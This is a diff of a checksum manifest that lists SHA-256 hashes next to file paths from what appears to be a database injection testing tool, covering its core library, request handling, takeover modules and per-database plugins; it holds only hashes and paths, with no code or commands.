+df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264  extra/shutils/recloak.sh
+1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f  extra/shutils/strip.sh
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  extra/vulnserver/__init__.py
+2ffe028b8b21306b6f528e62b214f43172fcf5bb59d317a13ba78e70155677ce  extra/vulnserver/vulnserver.py
+f9c96cd3fe99578bed9d49a8bdf8d76836d320a7c48c56eb0469f48b36775c35  lib/controller/action.py
+062c02a876644fc9bb4be37b545a325c600ee0b62f898f9723676043303659d4  lib/controller/checks.py
+11c494dd61fc8259d5f9e60bd69c4169025980a4ce948c6622275179393e9bef  lib/controller/controller.py
+46d70b69cc7af0849242da5094a644568d7662a256a63e88ae485985b6dccf12  lib/controller/handler.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/controller/__init__.py
+826c33f1105be4c0985e1bbe1d75bdb009c17815ad6552fc8d9bf39090d3c40f  lib/core/agent.py
+c2966ee914b98ba55c0e12b8f76e678245d08ff9b30f63c4456721ec3eff3918  lib/core/bigarray.py
+9e3c165eee6fbe2bc02f5e7301bca6633ff60894a5a8ec5b3622db2747bd5705  lib/core/common.py
+5c26b0f308266bc3a9679ef837439e38d1dc7a69eac6bd3422280f49aaf114d2  lib/core/compat.py
+b60c96780cad4a257f91a0611b08cfcc52f242908c5d5ab2bf9034ef07869602  lib/core/convert.py
+5e381515873e71c395c77df00bf1dd8c4592afc6210a2f75cbc20daf384e539f  lib/core/data.py
+724b3f6f5bcd1479de19c7835577bcd8811f2ec72ccaebaf5b2dfdb8161a167d  lib/core/datatype.py
+55e7d63aae317763afcbdbea1c7731497c93bad14f6d032a0ccfffe72ffc121f  lib/core/decorators.py
+595c7dfde7c67cdb674fb019a24b07a501a9cdb6321e4f8ce3d3354cd9526eae  lib/core/defaults.py
+e8f6f1df8814b7b03c3eba22901837555083f66c99ee93b943911de785736bfa  lib/core/dicts.py
+5fb6ef1772580a701b1b109858163a1c16446928f8c29170d67ad4d0171c0950  lib/core/dump.py
+874c8eb7391ef0f82b6e870499daa336a79a6d014a23e7452205f5ef0b6a9744  lib/core/enums.py
+67ab7a8f756b63e75e8b564d647e72362d7245d6b32b2881be02321ceaaca876  lib/core/exception.py
+0379d59be9e2400e39abbb99fbceeb22d4c3b69540504a0cb59bf3aaf53d05a9  lib/core/gui.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/core/__init__.py
+fce3fd4b161ec1c6e9d5bf1dca5bc4083e07d616ed2c14b798e96b60ec67c2b2  lib/core/log.py
+4caebf27d203673b8ad32394937397319f606c4e1f1e1a2a221402d39c644b40  lib/core/optiondict.py
+1171119f6289ab981e5912e73801fe1862c7c012bc1da577df5c6497f348a85e  lib/core/option.py
+d2d81ee7520b55571923461a2bdfaa68dda74a89846761338408ab0acf08d3a5  lib/core/patch.py
+bf77f9fc4296f239687297aee1fd6113b34f855965a6f690b52e26bd348cb353  lib/core/profiling.py
+4ccce0d53f467166d4084c9ef53a07f54cc352e75f785454a31c8a820511a84e  lib/core/readlineng.py
+4eff81c639a72b261c8ba1c876a01246e718e6626e8e77ae9cc6298b20a39355  lib/core/replication.py
+bbd1dcda835934728efc6d68686e9b0da72b09b3ee38f3c0ab78e8c18b0ba726  lib/core/revision.py
+eed6b0a21b3e69c5583133346b0639dc89937bd588887968ee85f8389d7c3c96  lib/core/session.py
+d21819319315ee0e2b686639f6ca426b5172d0105315a42b3d3f1a98d1f2e8ad  lib/core/settings.py
+2bec97d8a950f7b884e31dfe9410467f00d24f21b35672b95f8d68ed59685fd4  lib/core/shell.py
+e90a359b37a55c446c60e70ccd533f87276714d0b09e34f69b0740fd729ddbf8  lib/core/subprocessng.py
+54f7c70b4c7a9931f7ff3c1c12030180bde38e35a306d5e343ad6052919974cd  lib/core/target.py
+970b1c3e59481f11dd185bdde52f697f7d8dfc3152d24e3d336ec3fab59a857c  lib/core/testing.py
+8cb7424aa9d42d028a6780250effe4e719d9bb35558057f8ebe9e32408a6b80f  lib/core/threads.py
+ff39235aee7e33498c66132d17e6e86e7b8a29754e3fdecd880ca8356b17f791  lib/core/unescaper.py
+2984e4973868f586aa932f00da684bf31718c0331817c9f8721acd71fd661f89  lib/core/update.py
+ce65f9e8e1c726de3cec6abf31a2ffdbc16c251f772adcc14f67dee32d0f6b57  lib/core/wordlist.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/__init__.py
+ba16fdd71fba31990dc92ff5a7388fb0ebac21ca905c314be6c8c2b868f94ab7  lib/parse/banner.py
+d757343f241b14e23aefb2177b6c2598f1bc06253fd93b0d8a28d4a55c267100  lib/parse/cmdline.py
+d1fa3b9457f0e934600519309cbd3d84f9e6158a620866e7b352078c7c136f01  lib/parse/configfile.py
+9af4c86e41e50bd6055573a7b76e380a6658b355320c72dd6d2d5ddab14dc082  lib/parse/handler.py
+13b3ab678a2c422ce1dea9558668c05e562c0ec226f36053259a0be7280ebf92  lib/parse/headers.py
+b48edf3f30db127b18419f607894d5de46fc949d14c65fdc85ece524207d6dfd  lib/parse/html.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/parse/__init__.py
+8743332261f8b0da52c94ca56510f0f2e856431c2bbe2164efdd3de605c2802b  lib/parse/payloads.py
+23adb7169e99554708062ff87ae795b90c6a284d1b5159eada974bf9f8d7583f  lib/parse/sitemap.py
+0acfa7da4b0dbc81652b018c3fdbb42512c8d7d5f01bbf9aef18e5ea7d38107a  lib/request/basicauthhandler.py
+2395d6d28d6a1e342fccd56bb741080468a777b9b2a5ddd5634df65fe9785cef  lib/request/basic.py
+ead55e936dfc8941e512c8e8a4f644689387f331f4eed97854c558be3e227a91  lib/request/chunkedhandler.py
+06128c4e3e0e1fe34618de9d1fd5ee21292953dce4a3416567e200d2dfda79f2  lib/request/comparison.py
+9ffc0e799273240c26d32521f58b3e3fd8a3c834e9db2ce3bda460595e6be6c8  lib/request/connect.py
+470e96857a7037a2d74b2c4b1c8c5d8379b76ea8cbdb1d8dd4367a7a852fa93c  lib/request/direct.py
+e802cc9099282764da0280172623600b6b9bb9fe1c87f352ade8be7a3f622585  lib/request/dns.py
+9922275d3ca79f00f9b9301f4e4d9f1c444dc7ac38de6d50ef253122abae4833  lib/request/httpshandler.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/request/__init__.py
+ea8261a5099ca66032ae7606e5392de719827a71750c203e3fc6bb6759757cf3  lib/request/inject.py
+ba87a7bc91c1ec99a273284b9d0363358339aab0220651ff1ceddf3737ce2436  lib/request/methodrequest.py
+4ba939b6b9a130cd185e749c585afa2c4c8a5dbcbf8216ecc4f3199fe001b3e2  lib/request/pkihandler.py
+c6b222c0d34313cdea82fb39c8ead5d658400bf41e56aabd9640bdcf9bedc3a1  lib/request/rangehandler.py
+06bba7e3d77a3fb35e0b87420bb29bb1793f6dd7521fbfb063484575ac1c48e1  lib/request/redirecthandler.py
+9c5aab24a226acc093c62ca0b8c3736fb0dc2cf88ccbba85b323980a0f669d3e  lib/request/templates.py
+f07a4e40819dc2e7920f9291424761971a9769e4acfd34da223f24717563193c  lib/takeover/abstraction.py
+e775a0abe52c1a204c484ef212ff135c857cc8b7e2c94da23b5624c561ec4b9e  lib/takeover/icmpsh.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/takeover/__init__.py
+c3d8c98a6d44d392f7b8572d3b35804f85838ddbc8e2a2f57af58f8e598af2f4  lib/takeover/metasploit.py
+a31b1bf60fcf58b7b735a64d73335212d5089e84051ff7883c14f6c73e055643  lib/takeover/registry.py
+90655344c9968e841eb809845e30da8cc60160390911345ac873be39d270467f  lib/takeover/udf.py
+145a9a8b7afb6504700faa1c61ca18eabab3253951788f29e7ee63c3ebff0e48  lib/takeover/web.py
+c4dc16a5ec302a504096f3caf0aa72e15c8b65bf03d9b62aa71bd4d384afec11  lib/takeover/xp_cmdshell.py
+6f87a9f4d9213363dd19bf687ff641ab76908e6ee67c79ec4b8fe831aad85e5d  lib/techniques/blind/inference.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/techniques/blind/__init__.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/techniques/dns/__init__.py
+3aeb3941602911434d27ca49574950806da9cf5613f284f295016b4611bab488  lib/techniques/dns/test.py
+f948fefb0fa67da8cf037f7abbcdbb740148babda9ad8a58fab1693456834817  lib/techniques/dns/use.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/techniques/error/__init__.py
+81d750702c21a129d13a903a8df7c9e68f788543a3024413de418576c1a70649  lib/techniques/error/use.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/techniques/__init__.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/techniques/union/__init__.py
+700cc5e8cae85bd86674d0cb6c97093fde2c52a480cc1e40ae0010fffd649395  lib/techniques/union/test.py
+4252a1829e60bb9a69e3927bf68a320976b8ef637804b7032d7497699f2e89e7  lib/techniques/union/use.py
+6b3f83a85c576830783a64e943a58e90b1f25e9e24cd51ae12b1d706796124e9  lib/utils/api.py
+1d4d1e49a0897746d4ad64316d4d777f4804c4c11e349e9eb3844130183d4887  lib/utils/brute.py
+c0a4765aa80c5d9b7ef1abe93401a78dd45b2766a1f4ff6286287dc6188294de  lib/utils/crawler.py
+3f97e327c548d8b5d74fda96a2a0d1b2933b289b9ec2351b06c91cefdd38629d  lib/utils/deps.py
+e81393f0d077578e6dcd3db2887e93ac2bfbdef2ce87686e83236a36112ca7d3  lib/utils/getch.py
+83b45227efb5898f6a2c6d79e0db74cce9ab733b85b2a8214a2472deb6159b93  lib/utils/har.py
+bb8e8151eeb00206d6cb3c92f5d166bb5a4ff3d5715bbd791e75536f88142c42  lib/utils/hashdb.py
+a8adf8103eb2824b3c516252250700b47e6fd686b6186b7ed71c34f02fada13c  lib/utils/hash.py
+c4dcf62230e843ff9290910620533b000742ae1e7ad92e2cf4ea2bec37d502dc  lib/utils/httpd.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  lib/utils/__init__.py
+378990e2ab437bc24aa52bd75ab28fddc467c0b8b74d4486490dcd5110f0e058  lib/utils/pivotdumptable.py
+3d50bc48f9512d5833b38ca1edf5f446b019d3a22df846937b4a9b511c63e901  lib/utils/progress.py
+7533a8ba0aa11639e10cbee2f47979a66ccf989fcc75c5c4e30cafc4568b7acc  lib/utils/purge.py
+3bab0bb4681fa1de5d19fbc7bc4f6a4efdb436439def9983bb5f4d2905ac4cad  lib/utils/safe2bin.py
+e6382d5b1bd1adb0877963b977a601838f0cc68788bac7f43f05bab1118e9e5c  lib/utils/search.py
+8258d0f54ad94e6101934971af4e55d5540f217c40ddcc594e2fba837b856d35  lib/utils/sgmllib.py
+942916d4cdc6ff3fdffaedc897b6483e1701d835c51a33c48e19082015ff0a39  lib/utils/sqlalchemy.py
+28f45811635fd3605e9949c0731553a8d4f578924d1f47266ab6dba9e015e652  lib/utils/timeout.py
+d44774d5c126d974934784a14674254d84fa06aa49ca621ebf19a6beac3f58e9  lib/utils/versioncheck.py
+12ad40d917749dd3b235aa9ee0d2d6a45f4ee37e46f6db79d196906f92f4331e  lib/utils/xrange.py
+af2c47d2a12cfb1131ab61fc3654b962309690caad65e3db8285bde15990d19c  LICENSE
+55a454a886173180da1ba9edcbe36725e98cbdf09754349efdcd1632836899af  plugins/dbms/access/connector.py
+6e3cee389fe2a716c93ac90882f71251e603e816dfdbefd9b2e61ca8547b245f  plugins/dbms/access/enumeration.py
+461d93cae6c22070ea1c788e7cdfd49153d3b842e2b1a5e395d12593556c1370  plugins/dbms/access/filesystem.py
+93f889dddf94329c8c31fd68c67b8fefb8d2f6b7e78ffb6987794f2c16d02a7d  plugins/dbms/access/fingerprint.py
+234bd0ea20badf44a7d5ff0d9071655072b66a85201a415fcc63c16dca10e72e  plugins/dbms/access/__init__.py
+6a2b30cff7644dc52fcf46c01143abfeb04b8e805c4f43b7e904333933ae8bca  plugins/dbms/access/syntax.py
+d9a8d0fd234b482ed4e01f28c24561ee08102c7691acb5543c7aa014e4f44e75  plugins/dbms/access/takeover.py
+4729e0623c3d0feefc8af85c7d9adce4c2c96c8c494f2e32d25c4c95aeb0819d  plugins/dbms/altibase/connector.py
+f154da0869c8103ce6e19ba21b780737263b3fb188c5c77b0315cd7d36a50633  plugins/dbms/altibase/enumeration.py
+657a4e3657a1fdc20312978b090dd2d4a9d5bf1a21df41703ca7ee3e3aea6a21  plugins/dbms/altibase/filesystem.py
+3c808d22eb17259e590cf0c5a9fe41e5d56b95bce400fa502b7a5583aa78bc64  plugins/dbms/altibase/fingerprint.py
+d04f83f21eb063575180005155505d868a448afff0a12866dddd3f1939b50210  plugins/dbms/altibase/__init__.py
+3c163c8135e2ab8ed17b0000862a1b2d7cf2ec1e7d96d349ec644651cdecad49  plugins/dbms/altibase/syntax.py
+c90d520338946dfae7b934bb3aab9bf8db720d4092cadd5ae825979d2665264e  plugins/dbms/altibase/takeover.py
+853f3b74bbffe88b0715681d2c7a966f1439e49f753a4f0623ce194028ac997a  plugins/dbms/cache/connector.py
+2157ddbb0d499c44d2d58a0e9d31ae4f962c8420737c1b0bf16ab741f0577be5  plugins/dbms/cache/enumeration.py
+657a4e3657a1fdc20312978b090dd2d4a9d5bf1a21df41703ca7ee3e3aea6a21  plugins/dbms/cache/filesystem.py
+9100847939a5e65b8604a7c5f42ce4d16166bd8713dff82575a3fb1ce6201318  plugins/dbms/cache/fingerprint.py
+34b7a28b40f24799fd0b5b9e3c97a8d67d463cc569aac33e4bbbd85e5ea7d974  plugins/dbms/cache/__init__.py
+0cdf725a6d3296d521cdc24b77416ec67b1994f6eeed7751122c77d982798e1e  plugins/dbms/cache/syntax.py
+30de9bd68cd7244ac840539002775eef50d22bcdd61d1386fb01051798b4a0b8  plugins/dbms/cache/takeover.py
+e0d2522dc664a7da0c9a32a34e052b473a0f3ebb46c86e9cea92a5f7e9ab33b0  plugins/dbms/clickhouse/connector.py
+4b6418c435fa69423857a525d38705666a27ecf6edd66527e51af46561ead621  plugins/dbms/clickhouse/enumeration.py
+d70dc313dac1047c9bb8e1d1264f17fa6e03f0d0dfeb8692c4dcec2c394a64bc  plugins/dbms/clickhouse/filesystem.py
+7d6278c7fe14fd15c7ed8d2aee5e66f1ab76bea9f4b0c75f2ae9137ddbda236b  plugins/dbms/clickhouse/fingerprint.py
+9af365a8a570a22b43ca050ce280da49d0a413e261cc7f190a49336857ac026e  plugins/dbms/clickhouse/__init__.py
+695a7c428c478082072d05617b7f11d24c79b90ca3c117819258ef0dbdf290a5  plugins/dbms/clickhouse/syntax.py
+ec61ff0bb44e85dc9c9df8c9b466769c5a5791c9f1ffb944fdc3b1b7ef02d0d5  plugins/dbms/clickhouse/takeover.py
+318df338d30f8ffaffb50060a0e7c71116a11cdd260593c4c9758ae49beafedd  plugins/dbms/cratedb/connector.py
+fcb3b11e62a0d07c1899bddbb77923ab51f759f73dbfbeb6dd0e39d8d963f5b6  plugins/dbms/cratedb/enumeration.py
+657a4e3657a1fdc20312978b090dd2d4a9d5bf1a21df41703ca7ee3e3aea6a21  plugins/dbms/cratedb/filesystem.py
+65bd61ff16f2a1bcacac85c4f52898a95b64fca3f584727cd14ccd14c8d78587  plugins/dbms/cratedb/fingerprint.py
+e3b2d41f0fccf36b3aa0d77eb8539f7c7eab425450cde0445bcff93d60ff28d0  plugins/dbms/cratedb/__init__.py
+1b590a87dca60c10c967765d1b489d58d91da68cae251e491de88ff2fb24d943  plugins/dbms/cratedb/syntax.py
+6e5b266048118dff77d53b796a92985d4ed1c495dcae369d1c058ad2775119b4  plugins/dbms/cratedb/takeover.py
+ce34f2ed0278763fdc88f854cb972b2eee39c90ae9992fe6b073ebdeb3eb0c4a  plugins/dbms/cubrid/connector.py
+6bdc37825741e63fd55b6ba404164d56618acd9e272d825500d6fe58164ad4fd  plugins/dbms/cubrid/enumeration.py
+657a4e3657a1fdc20312978b090dd2d4a9d5bf1a21df41703ca7ee3e3aea6a21  plugins/dbms/cubrid/filesystem.py
+b90e5c873f1c99817752a011cbd85d4265007efbc70833b5681f8b3f06c1ab2c  plugins/dbms/cubrid/fingerprint.py
+7c6d28a7601890e6eaa6f44ae38969199f6e77203990cb949f5e0c7b0a789c46  plugins/dbms/cubrid/__init__.py
+881f9c23a53afde5073f790071614403fe76f339b2b0c9fc86d6c40da8b0473b  plugins/dbms/cubrid/syntax.py
+16091b3e625d40961a7a6c5edfe8d882e5fbe50938c3cc6d44f2eac0d5deab55  plugins/dbms/cubrid/takeover.py
+fd4385269d1034c909fe515c09ca12113152852e2780c54e0e5e6d11c28eb596  plugins/dbms/db2/connector.py
+532c175c513b6ef8de5d00014d2046c2b25d1a076856ad8fc9f3f100a61e3f14  plugins/dbms/db2/enumeration.py
+657a4e3657a1fdc20312978b090dd2d4a9d5bf1a21df41703ca7ee3e3aea6a21  plugins/dbms/db2/filesystem.py
+00376b6077af499499158eeb08d750fec756057b9baa464591d6eef0d4ca7e57  plugins/dbms/db2/fingerprint.py
+5adf4f0cff2935a56dd8c7a166235e4f2f34e74c4e4b4fb2573366af68623699  plugins/dbms/db2/__init__.py
+3c163c8135e2ab8ed17b0000862a1b2d7cf2ec1e7d96d349ec644651cdecad49  plugins/dbms/db2/syntax.py
+471f50a708a1b27ede808ce2a8fc6875e49288a2dcb2627b1af7020f3837f7c4  plugins/dbms/db2/takeover.py
+1ce9db8df570b85bec4f8309be2ef06dd62018364bf15992195cb543a6b49716  plugins/dbms/derby/connector.py
+8e8f6b3d82fcad643b0937a14f40367eaae6fa487a9212280e2f4f163047696f  plugins/dbms/derby/enumeration.py
+657a4e3657a1fdc20312978b090dd2d4a9d5bf1a21df41703ca7ee3e3aea6a21  plugins/dbms/derby/filesystem.py
+4025083e6fed8464797c64ac8f65e6e422b5d6dc8661896a745552a4ee995bee  plugins/dbms/derby/fingerprint.py
+13ddcf11f9cb4ffe4a201ce91fb116720a9168911975e63ecf5472060253b91a  plugins/dbms/derby/__init__.py
+1b590a87dca60c10c967765d1b489d58d91da68cae251e491de88ff2fb24d943  plugins/dbms/derby/syntax.py
+a4a38ca00d2161ab36bb2506f10907d42f432c4dfff64e3743cdeae556c91255  plugins/dbms/derby/takeover.py
+00e13c9bc3e4c5e27c717fa71bec50357ba51a1866f98c6809e2d24626302376  plugins/dbms/extremedb/connector.py
+633357a29048f2b72809e8083c97894f51509a37df061a2a29d8f820e04cac35  plugins/dbms/extremedb/enumeration.py
+06239d5e2bdda53abf220d01e0066ffb8effffc39462f7746f27b1dba45267de  plugins/dbms/extremedb/filesystem.py
+e41b0d6517fd065e17e53634d662b6e487128ab085a99abfa36fa4268b84cfe2  plugins/dbms/extremedb/fingerprint.py
+8d97040ca717d56708915325a8c351af529a155daef5e3a13f1940614d762445  plugins/dbms/extremedb/__init__.py
+1b590a87dca60c10c967765d1b489d58d91da68cae251e491de88ff2fb24d943  plugins/dbms/extremedb/syntax.py
+38833cbc9b77747e8a8914f3c9ec05cfdd44c56da7a197c4e3bdd879902c888c  plugins/dbms/extremedb/takeover.py
+65040b861e0116e193d5a561717b2ce6052bdc93481dbc0bb7a6852b6603442d  plugins/dbms/firebird/connector.py
+284835f0dd88216e1b0efff15fc4cc44503a3f07649fbe77987dfcd453752f6b  plugins/dbms/firebird/enumeration.py
+114057c87f48055025744f0285f10efa9657a2ed98c3726781db3638da9c9422  plugins/dbms/firebird/filesystem.py
+ec6c4ef29e37496becf61c31ffa058886edd065ff40981c6e766e78ff12bbe2c  plugins/dbms/firebird/fingerprint.py
+a4d3186858759502579831b622c60689307a6439759e54a447093753e80109bc  plugins/dbms/firebird/__init__.py
+01275393a50ec7a50132942d4f79892b08cf68aec949873f3da262169d3f7485  plugins/dbms/firebird/syntax.py
+7cb25444d6a149187b3ce538f763027f28a1a068a1abc5a3da6120580be8772c  plugins/dbms/firebird/takeover.py
+4292e4a76fe313868970f4539a317001c74e3836b2b69b3c3badaf296b1eb22e  plugins/dbms/frontbase/connector.py
+cff20f1ccaf8b0d739d46896f971a012886c66248305c019becb811b8f541307  plugins/dbms/frontbase/enumeration.py
+25ddf6d047e182edc39b57bf1d9f17d25061a9e8fc32161b83ac750fe1724ac8  plugins/dbms/frontbase/filesystem.py
+4b033054189b2da91380e77dccf291857447b3974a6b26865e32d664afa9d089  plugins/dbms/frontbase/fingerprint.py
+9b3dc128460f77e8c605ab33e2a8d4150eeb351e12a37903bf8763446c624153  plugins/dbms/frontbase/__init__.py
+1b590a87dca60c10c967765d1b489d58d91da68cae251e491de88ff2fb24d943  plugins/dbms/frontbase/syntax.py
+89948ac31e8de2d1cf0c62f8dff259e34caf4bf2fd0f8e52960327b550eed34d  plugins/dbms/frontbase/takeover.py
+de5f531949c95cf91ffe0fe90b5bf586373c7ae5a7f02b7eecd95c3ca9cc4d24  plugins/dbms/h2/connector.py
+05843e3115f14366ec8f7f756e07045af59acc48646cd1959edf91e0b2806f57  plugins/dbms/h2/enumeration.py
+784ec057d71949fce341ec6a953b91dd085ae1b58e593f04e1efb6e4a5f313b4  plugins/dbms/h2/filesystem.py
+e98b9eda4e689fb62012f16483e2898b71930b5378b8dbf10e9bb24fc78a276b  plugins/dbms/h2/fingerprint.py
+d404aacac0413373bda0a39a45e4a9c000bb6131fcd7c6f2e70815f1eb6ccefd  plugins/dbms/h2/__init__.py
+ede16cc48cd7f51db8225c9b3f802752dd407a9fe489c24ba8400ae9aaa9791e  plugins/dbms/h2/syntax.py
+e5de2d96b1871d9824569914d54568e4dae929e5ee925ad80a77d08d680904e3  plugins/dbms/h2/takeover.py
+1831eb4a604e30e9dc1a6218cb4c8f9cabaeb81351fe34f8cfcdd054cfa379c5  plugins/dbms/hsqldb/connector.py
+0a726c004e17d3ff9aaaf2b96c095042d7533befa4fdd80faf28c76297350f4d  plugins/dbms/hsqldb/enumeration.py
+193f81f821e1d95fd6511b62344d71a99eb70aef5eedd3833d3b37d6813cc9f8  plugins/dbms/hsqldb/filesystem.py
+bde755a921c9d8537ff5853997bc0f43f41453976d6660702b7d00ae5161c62f  plugins/dbms/hsqldb/fingerprint.py
+b016973c12a426f10f11ea58fb14401831156dc7222bf851d2a90c34c6b6c707  plugins/dbms/hsqldb/__init__.py
+ede16cc48cd7f51db8225c9b3f802752dd407a9fe489c24ba8400ae9aaa9791e  plugins/dbms/hsqldb/syntax.py
+cf02f962cd434abd0e3b5b3993b489c2114977fffa5254686575b33ffb37aed0  plugins/dbms/hsqldb/takeover.py
+8064467fd081da10bd2d008e6015f095c04aa50db3c9bbecbd20a033465527b3  plugins/dbms/informix/connector.py
+9bc07d4ea47e451e26c133015f0af31577625986b21ff39e5d8b57c05a9331c7  plugins/dbms/informix/enumeration.py
+657a4e3657a1fdc20312978b090dd2d4a9d5bf1a21df41703ca7ee3e3aea6a21  plugins/dbms/informix/filesystem.py
+e2ccc591d5a9d9e90ede93fb055791babc492cd7149183339133f79be0d4302c  plugins/dbms/informix/fingerprint.py
+651635264fea756af0cef5271a70ce38b2801909147fc28d53e01c7cfe8a8f6b  plugins/dbms/informix/__init__.py
+e3e38f0285479aa77036002e326261380112560747ef8ee51538891413e3b90a  plugins/dbms/informix/syntax.py
+471f50a708a1b27ede808ce2a8fc6875e49288a2dcb2627b1af7020f3837f7c4  plugins/dbms/informix/takeover.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  plugins/dbms/__init__.py
+553d7fd01513d6d0e80ef75730204f452f385f4f2f46b5f7d242c6defe52c348  plugins/dbms/maxdb/connector.py
+2f428ddaeff3ae687d7bab916a769939f98547887a276e93b95eb849c66306df  plugins/dbms/maxdb/enumeration.py
+00a24e5179f40a79705042854ed12ba2b0fc96df9e46c85bde6d49bf469d23e1  plugins/dbms/maxdb/filesystem.py
+5fb3c5e02dee783879b1668730ac6ea26011afabd71d91ba8b1872247c1c5867  plugins/dbms/maxdb/fingerprint.py
+53743ebba549f2d56adf0fd415790c58b86f92220283097b336c2d1d569f8c7b  plugins/dbms/maxdb/__init__.py
+1b590a87dca60c10c967765d1b489d58d91da68cae251e491de88ff2fb24d943  plugins/dbms/maxdb/syntax.py
+1cb27817683c67f71349df55b08082bd68c2e17407f91d67dc5fe7944cb1bbd2  plugins/dbms/maxdb/takeover.py
+d36af9d41a4cf080e8d0734b1ef824dc721bf8607a677ac1d31954ba3dc53326  plugins/dbms/mckoi/connector.py
+9a2a2744808f25a24b75ced3214e16597249c57d53db85258084f3a6da082eb7  plugins/dbms/mckoi/enumeration.py
+8d5f4442533ff2e0fe615f839ba751730383931f92425133f707bc8e82f4697a  plugins/dbms/mckoi/filesystem.py
+b36336ae534d372ec3598eab48896da5ebe1946c97f1a1a56b93105961c6b2b8  plugins/dbms/mckoi/fingerprint.py
+dcf4a6bfe55598017a45beefbacedb28f7dbef26f612c11db65bfeb768c380e8  plugins/dbms/mckoi/__init__.py
+1b590a87dca60c10c967765d1b489d58d91da68cae251e491de88ff2fb24d943  plugins/dbms/mckoi/syntax.py
+d2077417f4865b9f93a1c3a4190bd82570bc145a1755fb5e26b5b28c1a640618  plugins/dbms/mckoi/takeover.py
+1815a402f91d87905777cf1db45d7fbd99f0712a1cef2533e36298ea9b22eee8  plugins/dbms/mimersql/connector.py
+b71454d0f52bb633049f797e5b18ec931bc481d8c4d5046b5f30c37ec5dc1a6f  plugins/dbms/mimersql/enumeration.py
+657a4e3657a1fdc20312978b090dd2d4a9d5bf1a21df41703ca7ee3e3aea6a21  plugins/dbms/mimersql/filesystem.py
+080101c138a624e9ac7890c40175a6954f6dfea3c9d9f9e7d8d7b3954533ade5  plugins/dbms/mimersql/fingerprint.py
+8cf1c1e39107773b5f2e526edbab73999514c2daa0cd2f08061e8577babaf165  plugins/dbms/mimersql/__init__.py
+9acf4e3742a49b51f20282b750dee0db3dcf0ac90dd5839061665245c8d10eb3  plugins/dbms/mimersql/syntax.py
+b086998719dfe4a09517c333dc7be99d41a0a73d84b1aa446ef65da3a57dc69f  plugins/dbms/mimersql/takeover.py
+626442ba4cd5448fb63557d0c3151e947d442944b498abc81804cf374b725f03  plugins/dbms/monetdb/connector.py
+8403e8fc92861f7bf6f57cd47468f60119456bb4874d9886ee55a82df0af2859  plugins/dbms/monetdb/enumeration.py
+657a4e3657a1fdc20312978b090dd2d4a9d5bf1a21df41703ca7ee3e3aea6a21  plugins/dbms/monetdb/filesystem.py
+3d34ffdbf6e271213af750d4ff9d65c973809562b288d430e61cbe358427b767  plugins/dbms/monetdb/fingerprint.py
+84be6b07eac4ab617319d109de6c1f9a373178ad5dd8589c204413710575f18c  plugins/dbms/monetdb/__init__.py
+574c1ba8f4b9a6a80beae9f845ad820537da228743c8012ca906d26c38bcafda  plugins/dbms/monetdb/syntax.py
+84a42a2b17ecd9d0524bd9f6a11ccd9eb04e2b58d91025cb0c9cf023eb89c35c  plugins/dbms/monetdb/takeover.py
+e0ce08d19dc384c140230742c3d5f0c6cfdcc017e7ca81bf3fe1ead4abfa8155  plugins/dbms/mssqlserver/connector.py
+3b0093bb79d9579cb439bcf29880c242305a5ab8aba6d043f6058ffb89c5e8b5  plugins/dbms/mssqlserver/enumeration.py
+e16b6cad77d988c490cea7f4737eee072e5e99ddb96b4b54d60ed5468f6e1c69  plugins/dbms/mssqlserver/filesystem.py
+88a613aa168a2ce241f8bf2233a1f00e6216aef17e469d0543b6c678d14e9ea1  plugins/dbms/mssqlserver/fingerprint.py
+376656382ddbfdbf0001cc92f09fc58692c7645fdaf40788b314130a01f99eb6  plugins/dbms/mssqlserver/__init__.py
+fdc3effe9320197795137dedb58e46c0409f19649889177443a2cbf58787c0dd  plugins/dbms/mssqlserver/syntax.py
+77ea4b1cd1491b3f1e2e98a8ff2e20ac300b693dd39b0c7330e0b29e233a00df  plugins/dbms/mssqlserver/takeover.py
+7f0165c085b0cb7d168d86acb790741c7ba12ad01ca9edf7972cfb184adb3ee9  plugins/dbms/mysql/connector.py
+05c4624b2729f13af2dd19286fc9276fc97c0f1ff19a31255785b7581fc232ae  plugins/dbms/mysql/enumeration.py
+9915fd436ea1783724b4fe12ea1d68fc3b838c37684a2c6dd01d53c739a1633f  plugins/dbms/mysql/filesystem.py
+6114337620d824bf061abee8bcfe6e52aea38a54ee437f1cfff92a9a2097c6a7  plugins/dbms/mysql/fingerprint.py
+ae824d447c1a59d055367aa9180acb42f7bb10df0006d4f99eeb12e43af563ae  plugins/dbms/mysql/__init__.py
+60fc1c647e31df191af2edfd26f99bf739fec53d3a8e1beb3bffdcf335c781fe  plugins/dbms/mysql/syntax.py
+784c31c2c0e19feb88bf5d21bfc7ae4bf04291922e40830da677577c5d5b4598  plugins/dbms/mysql/takeover.py
+477d23978640da2c6529a7b2d2cb4b19a09dedc83960d222ad12a0f2434fb289  plugins/dbms/oracle/connector.py
+ff648ca28dfbc9cbbd3f3c4ceb92ccaacfd0206e580629b7d22115c50ed7eb06  plugins/dbms/oracle/enumeration.py
+3a53b87decff154355b7c43742c0979323ae9ba3b34a6225a326ec787e85ce6d  plugins/dbms/oracle/filesystem.py
+f8c0c05b518dbcdb6b9a618e3fa33daefdb84bea6cb70521b7b58c7de9e6bf3a  plugins/dbms/oracle/fingerprint.py
